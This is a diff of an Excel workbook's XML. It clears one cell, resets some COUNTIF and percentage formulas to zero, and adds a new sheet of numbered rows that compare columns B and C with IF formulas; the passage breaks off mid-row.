   <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
@@ -14413,25 +14420,23 @@
       <c r="B310" s="5" t="s">
         <v>664</v>
       </c>
-      <c r="C310" s="5" t="s">
-        <v>664</v>
-      </c>
+      <c r="C310" s="5"/>
       <c r="D310" t="b">
         <f t="shared" si="4"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="312" spans="1:10" x14ac:dyDescent="0.25">
       <c r="D312">
         <f>COUNTIF(D94:D311,TRUE)</f>
-        <v>1</v>
+        <v>0</v>
       </c>
       <c r="F312" t="s">
         <v>456</v>
       </c>
       <c r="G312">
         <f>SUM(D312)</f>
-        <v>1</v>
+        <v>0</v>
       </c>
       <c r="I312" t="s">
         <v>458</v>
@@ -14447,11 +14452,1790 @@
       </c>
       <c r="G313">
         <f>SUM(G312/191*100)</f>
-        <v>0.52356020942408377</v>
+        <v>0</v>
       </c>
     </row>
   </sheetData>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
   <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
 </worksheet>
+</file>
+
+<file path=xl/worksheets/sheet7.xml><?xml version="1.0" encoding="utf-8"?>
+<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{976E2290-8C2D-4F81-B5E6-B6A7678023AD}">
+  <dimension ref="A1:G149"/>
+  <sheetViews>
+    <sheetView tabSelected="1" topLeftCell="A130" workbookViewId="0">
+      <selection activeCell="G149" sqref="G149"/>
+    </sheetView>
+  </sheetViews>
+  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
+  <cols>
+    <col min="1" max="1" width="9.140625" style="1"/>
+    <col min="2" max="2" width="17.5703125" customWidth="1"/>
+    <col min="3" max="3" width="18.42578125" customWidth="1"/>
+    <col min="4" max="4" width="9.140625" customWidth="1"/>
+  </cols>
+  <sheetData>
+    <row r="1" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A1" s="1" t="s">
+        <v>0</v>
+      </c>
+      <c r="B1" t="s">
+        <v>1</v>
+      </c>
+      <c r="C1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="2" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A2" s="1">
+        <v>1</v>
+      </c>
+      <c r="B2" t="s">
+        <v>665</v>
+      </c>
+      <c r="D2" t="b">
+        <f>IF(B2=C2,TRUE,FALSE)</f>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="3" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A3" s="1">
+        <v>2</v>
+      </c>
+      <c r="B3" t="s">
+        <v>665</v>
+      </c>
+      <c r="D3" t="b">
+        <f t="shared" ref="D3:D66" si="0">IF(B3=C3,TRUE,FALSE)</f>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="4" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A4" s="1">
+        <v>3</v>
+      </c>
+      <c r="B4" t="s">
+        <v>665</v>
+      </c>
+      <c r="D4" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="5" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A5" s="1">
+        <v>4</v>
+      </c>
+      <c r="B5" t="s">
+        <v>665</v>
+      </c>
+      <c r="D5" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="6" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A6" s="1">
+        <v>5</v>
+      </c>
+      <c r="B6" t="s">
+        <v>264</v>
+      </c>
+      <c r="D6" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="7" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A7" s="1">
+        <v>6</v>
+      </c>
+      <c r="B7" t="s">
+        <v>433</v>
+      </c>
+      <c r="D7" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="8" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A8" s="1">
+        <v>7</v>
+      </c>
+      <c r="B8" t="s">
+        <v>264</v>
+      </c>
+      <c r="D8" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="9" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A9" s="1">
+        <v>8</v>
+      </c>
+      <c r="B9" t="s">
+        <v>264</v>
+      </c>
+      <c r="D9" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="10" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A10" s="1">
+        <v>9</v>
+      </c>
+      <c r="B10" t="s">
+        <v>433</v>
+      </c>
+      <c r="D10" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="11" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A11" s="1">
+        <v>10</v>
+      </c>
+      <c r="B11" t="s">
+        <v>264</v>
+      </c>
+      <c r="D11" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="12" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A12" s="1">
+        <v>11</v>
+      </c>
+      <c r="B12" t="s">
+        <v>665</v>
+      </c>
+      <c r="D12" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="13" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A13" s="1">
+        <v>12</v>
+      </c>
+      <c r="B13" t="s">
+        <v>433</v>
+      </c>
+      <c r="D13" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="14" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A14" s="1">
+        <v>13</v>
+      </c>
+      <c r="B14" t="s">
+        <v>433</v>
+      </c>
+      <c r="D14" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="15" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A15" s="1">
+        <v>14</v>
+      </c>
+      <c r="B15" t="s">
+        <v>666</v>
+      </c>
+      <c r="D15" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="16" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A16" s="1">
+        <v>15</v>
+      </c>
+      <c r="B16" t="s">
+        <v>665</v>
+      </c>
+      <c r="D16" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="17" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A17" s="1">
+        <v>16</v>
+      </c>
+      <c r="B17" t="s">
+        <v>433</v>
+      </c>
+      <c r="D17" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="18" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A18" s="1">
+        <v>17</v>
+      </c>
+      <c r="B18" t="s">
+        <v>666</v>
+      </c>
+      <c r="D18" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="19" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A19" s="1">
+        <v>18</v>
+      </c>
+      <c r="B19" t="s">
+        <v>666</v>
+      </c>
+      <c r="D19" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="20" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A20" s="1">
+        <v>19</v>
+      </c>
+      <c r="B20" t="s">
+        <v>666</v>
+      </c>
+      <c r="D20" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="21" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A21" s="1">
+        <v>20</v>
+      </c>
+      <c r="B21" t="s">
+        <v>264</v>
+      </c>
+      <c r="D21" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="22" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A22" s="1">
+        <v>21</v>
+      </c>
+      <c r="B22" t="s">
+        <v>433</v>
+      </c>
+      <c r="D22" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="23" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A23" s="1">
+        <v>22</v>
+      </c>
+      <c r="B23" t="s">
+        <v>666</v>
+      </c>
+      <c r="D23" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="24" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A24" s="1">
+        <v>23</v>
+      </c>
+      <c r="B24" t="s">
+        <v>264</v>
+      </c>
+      <c r="D24" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="25" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A25" s="1">
+        <v>24</v>
+      </c>
+      <c r="B25" t="s">
+        <v>433</v>
+      </c>
+      <c r="D25" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="26" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A26" s="1">
+        <v>25</v>
+      </c>
+      <c r="B26" t="s">
+        <v>666</v>
+      </c>
+      <c r="D26" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="27" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A27" s="1">
+        <v>26</v>
+      </c>
+      <c r="B27" t="s">
+        <v>665</v>
+      </c>
+      <c r="D27" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="28" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A28" s="1">
+        <v>27</v>
+      </c>
+      <c r="B28" t="s">
+        <v>433</v>
+      </c>
+      <c r="D28" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="29" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A29" s="1">
+        <v>28</v>
+      </c>
+      <c r="B29" t="s">
+        <v>666</v>
+      </c>
+      <c r="D29" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="30" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A30" s="1">
+        <v>29</v>
+      </c>
+      <c r="B30" t="s">
+        <v>665</v>
+      </c>
+      <c r="D30" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="31" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A31" s="1">
+        <v>30</v>
+      </c>
+      <c r="B31" t="s">
+        <v>666</v>
+      </c>
+      <c r="D31" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="32" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A32" s="1">
+        <v>31</v>
+      </c>
+      <c r="B32" t="s">
+        <v>433</v>
+      </c>
+      <c r="D32" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="33" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A33" s="1">
+        <v>32</v>
+      </c>
+      <c r="B33" t="s">
+        <v>433</v>
+      </c>
+      <c r="D33" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="34" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A34" s="1">
+        <v>33</v>
+      </c>
+      <c r="B34" t="s">
+        <v>264</v>
+      </c>
+      <c r="D34" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="35" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A35" s="1">
+        <v>34</v>
+      </c>
+      <c r="B35" t="s">
+        <v>666</v>
+      </c>
+      <c r="D35" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="36" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A36" s="1">
+        <v>35</v>
+      </c>
+      <c r="B36" t="s">
+        <v>666</v>
+      </c>
+      <c r="D36" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="37" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A37" s="1">
+        <v>36</v>
+      </c>
+      <c r="B37" t="s">
+        <v>433</v>
+      </c>
+      <c r="D37" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="38" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A38" s="1">
+        <v>37</v>
+      </c>
+      <c r="B38" t="s">
+        <v>666</v>
+      </c>
+      <c r="D38" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="39" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A39" s="1">
+        <v>38</v>
+      </c>
+      <c r="B39" t="s">
+        <v>665</v>
+      </c>
+      <c r="D39" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="40" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A40" s="1">
+        <v>39</v>
+      </c>
+      <c r="B40" t="s">
+        <v>666</v>
+      </c>
+      <c r="D40" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="41" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A41" s="1">
+        <v>40</v>
+      </c>
+      <c r="B41" t="s">
+        <v>665</v>
+      </c>
+      <c r="D41" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="42" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A42" s="1">
+        <v>41</v>
+      </c>
+      <c r="B42" t="s">
+        <v>433</v>
+      </c>
+      <c r="D42" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="43" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A43" s="1">
+        <v>42</v>
+      </c>
+      <c r="B43" t="s">
+        <v>433</v>
+      </c>
+      <c r="D43" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="44" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A44" s="1">
+        <v>43</v>
+      </c>
+      <c r="B44" t="s">
+        <v>433</v>
+      </c>
+      <c r="D44" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="45" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A45" s="1">
+        <v>44</v>
+      </c>
+      <c r="B45" t="s">
+        <v>433</v>
+      </c>
+      <c r="D45" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="46" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A46" s="1">
+        <v>45</v>
+      </c>
+      <c r="B46" t="s">
+        <v>665</v>
+      </c>
+      <c r="D46" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="47" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A47" s="1">
+        <v>46</v>
+      </c>
+      <c r="B47" t="s">
+        <v>264</v>
+      </c>
+      <c r="D47" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="48" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A48" s="1">
+        <v>47</v>
+      </c>
+      <c r="B48" t="s">
+        <v>665</v>
+      </c>
+      <c r="D48" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="49" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A49" s="1">
+        <v>48</v>
+      </c>
+      <c r="B49" t="s">
+        <v>433</v>
+      </c>
+      <c r="D49" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="50" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A50" s="1">
+        <v>49</v>
+      </c>
+      <c r="B50" t="s">
+        <v>666</v>
+      </c>
+      <c r="D50" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="51" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A51" s="1">
+        <v>50</v>
+      </c>
+      <c r="B51" t="s">
+        <v>433</v>
+      </c>
+      <c r="D51" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="52" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A52" s="1">
+        <v>51</v>
+      </c>
+      <c r="B52" t="s">
+        <v>666</v>
+      </c>
+      <c r="D52" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="53" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A53" s="1">
+        <v>52</v>
+      </c>
+      <c r="B53" t="s">
+        <v>666</v>
+      </c>
+      <c r="D53" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="54" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A54" s="1">
+        <v>53</v>
+      </c>
+      <c r="B54" t="s">
+        <v>666</v>
+      </c>
+      <c r="D54" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="55" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A55" s="1">
+        <v>54</v>
+      </c>
+      <c r="B55" t="s">
+        <v>666</v>
+      </c>
+      <c r="D55" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="56" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A56" s="1">
+        <v>55</v>
+      </c>
+      <c r="B56" t="s">
+        <v>666</v>
+      </c>
+      <c r="D56" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="57" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A57" s="1">
+        <v>56</v>
+      </c>
+      <c r="B57" t="s">
+        <v>666</v>
+      </c>
+      <c r="D57" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="58" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A58" s="1">
+        <v>57</v>
+      </c>
+      <c r="B58" t="s">
+        <v>665</v>
+      </c>
+      <c r="D58" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="59" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A59" s="1">
+        <v>58</v>
+      </c>
+      <c r="B59" t="s">
+        <v>264</v>
+      </c>
+      <c r="D59" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="60" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A60" s="1">
+        <v>59</v>
+      </c>
+      <c r="B60" t="s">
+        <v>264</v>
+      </c>
+      <c r="D60" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="61" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A61" s="1">
+        <v>60</v>
+      </c>
+      <c r="B61" t="s">
+        <v>665</v>
+      </c>
+      <c r="D61" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="62" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A62" s="1">
+        <v>61</v>
+      </c>
+      <c r="B62" t="s">
+        <v>433</v>
+      </c>
+      <c r="D62" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="63" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A63" s="1">
+        <v>62</v>
+      </c>
+      <c r="B63" t="s">
+        <v>666</v>
+      </c>
+      <c r="D63" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="64" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A64" s="1">
+        <v>63</v>
+      </c>
+      <c r="B64" t="s">
+        <v>433</v>
+      </c>
+      <c r="D64" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="65" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A65" s="1">
+        <v>64</v>
+      </c>
+      <c r="B65" t="s">
+        <v>665</v>
+      </c>
+      <c r="D65" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="66" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A66" s="1">
+        <v>65</v>
+      </c>
+      <c r="B66" t="s">
+        <v>264</v>
+      </c>
+      <c r="D66" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="67" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A67" s="1">
+        <v>66</v>
+      </c>
+      <c r="B67" t="s">
+        <v>666</v>
+      </c>
+      <c r="D67" t="b">
+        <f t="shared" ref="D67:D130" si="1">IF(B67=C67,TRUE,FALSE)</f>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="68" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A68" s="1">
+        <v>67</v>
+      </c>
+      <c r="B68" t="s">
+        <v>264</v>
+      </c>
+      <c r="D68" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="69" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A69" s="1">
+        <v>68</v>
+      </c>
+      <c r="B69" t="s">
+        <v>433</v>
+      </c>
+      <c r="D69" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="70" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A70" s="1">
+        <v>69</v>
+      </c>
+      <c r="B70" t="s">
+        <v>433</v>
+      </c>
+      <c r="D70" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="71" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A71" s="1">
+        <v>70</v>
+      </c>
+      <c r="B71" t="s">
+        <v>665</v>
+      </c>
+      <c r="D71" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="72" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A72" s="1">
+        <v>71</v>
+      </c>
+      <c r="B72" t="s">
+        <v>264</v>
+      </c>
+      <c r="D72" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="73" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A73" s="1">
+        <v>72</v>
+      </c>
+      <c r="B73" t="s">
+        <v>433</v>
+      </c>
+      <c r="D73" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="74" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A74" s="1">
+        <v>73</v>
+      </c>
+      <c r="B74" t="s">
+        <v>665</v>
+      </c>
+      <c r="D74" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="75" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A75" s="1">
+        <v>74</v>
+      </c>
+      <c r="B75" t="s">
+        <v>433</v>
+      </c>
+      <c r="D75" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="76" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A76" s="1">
+        <v>75</v>
+      </c>
+      <c r="B76" t="s">
+        <v>666</v>
+      </c>
+      <c r="D76" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="77" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A77" s="1">
+        <v>76</v>
+      </c>
+      <c r="B77" t="s">
+        <v>665</v>
+      </c>
+      <c r="D77" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="78" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A78" s="1">
+        <v>77</v>
+      </c>
+      <c r="B78" t="s">
+        <v>433</v>
+      </c>
+      <c r="D78" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="79" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A79" s="1">
+        <v>78</v>
+      </c>
+      <c r="B79" t="s">
+        <v>433</v>
+      </c>
+      <c r="D79" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="80" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A80" s="1">
+        <v>79</v>
+      </c>
+      <c r="B80" t="s">
+        <v>264</v>
+      </c>
+      <c r="D80" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="81" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A81" s="1">
+        <v>80</v>
+      </c>
+      <c r="B81" t="s">
+        <v>665</v>
+      </c>
+      <c r="D81" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="82" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A82" s="1">
+        <v>81</v>
+      </c>
+      <c r="B82" t="s">
+        <v>666</v>
+      </c>
+      <c r="D82" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="83" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A83" s="1">
+        <v>82</v>
+      </c>
+      <c r="B83" t="s">
+        <v>264</v>
+      </c>
+      <c r="D83" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="84" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A84" s="1">
+        <v>83</v>
+      </c>
+      <c r="B84" t="s">
+        <v>666</v>
+      </c>
+      <c r="D84" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="85" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A85" s="1">
+        <v>84</v>
+      </c>
+      <c r="B85" t="s">
+        <v>665</v>
+      </c>
+      <c r="D85" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="86" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A86" s="1">
+        <v>85</v>
+      </c>
+      <c r="B86" t="s">
+        <v>264</v>
+      </c>
+      <c r="D86" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="87" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A87" s="1">
+        <v>86</v>
+      </c>
+      <c r="B87" t="s">
+        <v>264</v>
+      </c>
+      <c r="D87" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="88" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A88" s="1">
+        <v>87</v>
+      </c>
+      <c r="B88" t="s">
+        <v>666</v>
+      </c>
+      <c r="D88" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="89" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A89" s="1">
+        <v>88</v>
+      </c>
+      <c r="B89" t="s">
+        <v>264</v>
+      </c>
+      <c r="D89" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="90" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A90" s="1">
+        <v>89</v>
+      </c>
+      <c r="B90" t="s">
+        <v>665</v>
+      </c>
+      <c r="D90" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="91" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A91" s="1">
+        <v>90</v>
+      </c>
+      <c r="B91" t="s">
+        <v>433</v>
+      </c>
+      <c r="D91" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="92" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A92" s="1">
+        <v>91</v>
+      </c>
+      <c r="B92" t="s">
+        <v>665</v>
+      </c>
+      <c r="D92" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="93" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A93" s="1">
+        <v>92</v>
+      </c>
+      <c r="B93" t="s">
+        <v>264</v>
+      </c>
+      <c r="D93" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="94" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A94" s="1">
+        <v>93</v>
+      </c>
+      <c r="B94" t="s">
+        <v>264</v>
+      </c>
+      <c r="D94" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="95" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A95" s="1">
+        <v>94</v>
+      </c>
+      <c r="B95" t="s">
+        <v>666</v>
+      </c>
+      <c r="D95" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="96" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A96" s="1">
+        <v>95</v>
+      </c>
+      <c r="B96" t="s">
+        <v>433</v>
+      </c>
+      <c r="D96" t="b">
+        <f t="shared" si="1"/>
